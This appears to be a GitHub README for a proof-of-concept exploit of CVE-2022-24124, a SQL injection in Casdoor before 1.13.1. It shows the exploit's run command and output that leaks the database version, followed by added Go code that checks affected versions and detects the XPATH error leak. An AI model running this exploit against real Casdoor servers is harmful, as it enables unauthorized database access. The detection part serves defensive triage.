ColdFusionX/CVE-2022-24124

POC for CVE-2022-24124

Exploit Code for CVE-2022-24124 aka Casdoor SQL Injection

Exploit Links: [ExploitDB-50792] [PacketStormSecurity]

Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1

Intended only for educational use and testing in corporate environments.

Exploit Usage

Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1
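
For defenders triaging this issue, the following added example (not part of the original repository) checks whether a Casdoor version string falls in the affected range stated above (< 1.13.1) and flags response bodies or log lines that carry the XPATH error text shown in the output. The function names and the version-string format ("v1.13.0" or "1.13.0") are assumptions for illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// fixedVersion: the page lists Casdoor < 1.13.1 as affected.
var fixedVersion = [3]int{1, 13, 1}

// xpathLeak matches the database error text seen in the output above,
// with or without the quotes the database puts around the leaked value.
var xpathLeak = regexp.MustCompile(`XPATH syntax error: '?([^'\r\n"]+)`)

// isAffected reports whether a version such as "v1.13.0" is below 1.13.1.
// Assumed format: three dot-separated integers with an optional "v" prefix.
func isAffected(version string) (bool, error) {
	parts := strings.SplitN(strings.TrimPrefix(strings.TrimSpace(version), "v"), ".", 3)
	if len(parts) != 3 {
		return false, fmt.Errorf("unrecognised version %q", version)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return false, fmt.Errorf("unrecognised version %q", version)
		}
		if n != fixedVersion[i] {
			return n < fixedVersion[i], nil
		}
	}
	return false, nil // exactly 1.13.1, the first unaffected release
}

// leakedFragment returns the data a body exposes through an XPATH error, if any.
func leakedFragment(body string) (string, bool) {
	m := xpathLeak.FindStringSubmatch(body)
	if m == nil {
		return "", false
	}
	return strings.TrimSpace(m[1]), true
}

func main() {
	// Constructed inputs; the body is the output line shown above.
	affected, _ := isAffected("v1.13.0")
	frag, leaked := leakedFragment("XPATH syntax error: .12-MariaDB-0+deb11u1")
	fmt.Println(affected, leaked, frag)
}
```

A hit from leakedFragment in HTTP responses or application logs means database error text is reaching clients, which is worth investigating even on hosts that report a fixed version.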